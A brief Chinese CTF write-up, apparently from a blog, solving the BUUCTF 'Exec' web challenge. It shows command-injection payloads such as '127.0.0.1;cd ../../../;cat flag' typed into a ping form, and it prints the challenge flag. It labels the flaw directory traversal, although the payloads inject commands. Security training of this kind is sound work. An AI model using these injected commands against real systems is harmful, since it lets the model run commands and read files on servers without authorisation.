[ACTF2020 新生赛]Exec

[ACTF2020 新生赛]Exec

题目来源:buuctf

题目类型:web

涉及考点:目录遍历

1. 题目直接给了一个输入框,ping一下127.0.0.1看看

接着查看目录,直接127.0.0.1;ls

只有index.php,我们先看看:

127.0.0.1;cat index.php

发现还是这个输入页面,没别的东西了,我们接下来目录遍历去找flag

2. 逐步往上层遍历

利用 ../ 向上遍历,当传入127.0.0.1;cd ../../../;ls 时看到了flag:

直接查看就有了,最终构造的payload如下:

127.0.0.1;cd ../../../;cat flag
flag{d666afef-8d93-4e23-9a6c-46a14704e4bd}

3. 小结一下

目录遍历是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。如果没有针对目录遍历攻击采取任何防御措施,攻击者可以通过请求URL从服务器的文件系统中检索任意文件。

日期:2023.7.20

作者:y0Zero

posted @ 2023-07-20 18:04  y0Zero  阅读(354)  评论(0编辑  收藏  举报